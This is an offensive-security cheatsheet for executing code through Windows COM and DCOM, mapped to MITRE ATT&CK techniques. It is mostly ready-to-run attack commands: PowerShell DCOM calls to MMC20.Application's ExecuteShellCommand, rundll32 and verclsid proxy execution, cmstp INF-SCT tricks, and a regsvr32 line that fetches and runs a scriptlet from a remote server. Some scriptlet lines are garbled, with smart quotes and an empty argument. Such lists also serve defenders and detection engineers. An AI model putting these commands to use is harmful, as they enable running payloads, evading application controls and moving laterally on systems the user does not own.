COM Execution - T1559.001

Templates and methods of quickly executing COM and DCOM
Windows Components Object Model quick execution cheatsheet


Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID

Execution via CLSID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Execution via ProgID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

DCOM Execution

Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed Locally by specifying the loopback interface (
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1",""))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")


Execution via CLSID

Rundll32.exe -sta {GUID}

Execution via ProgID

Rundll32.exe -sta Scripting.Dictionary

Execution via shell32.dll

# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}

Scriptlet Execution from Remote Server

# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:").Exec();

Remote Scriptlet via INF file

# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1


COM Local Scriptlet Execution

# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct

COM Scriptlet Execution from Remote Server

# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll


Execution via INF file that downloads and executes a scriptlet (sct)
# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
AppAct = "SOFTWARE\Microsoft\Connection Manager"
cmstp.exe /su test.inf
Credit to @Amr_Thabet for the INF code




Execution via CLSID

verclsid.exe /S /C {CLSID}


Execution via CLSID

xwizard.exe RunWizard /taero /u {CLSID}

ATT&CK Techniques in this Page

  • Command and Scripting Interpreter: PowerShell - T1059.001
  • Inter-Process Communication: Component Object Model - T1559.001
  • System Binary Proxy Execution: CMSTP - T1218.003
  • System Binary Proxy Execution: Rundll32 - T1218.011
  • System Binary Proxy Execution: Verclsid - T1218.012
  • System Binary Proxy Execution: Regsvr32 - T1218.010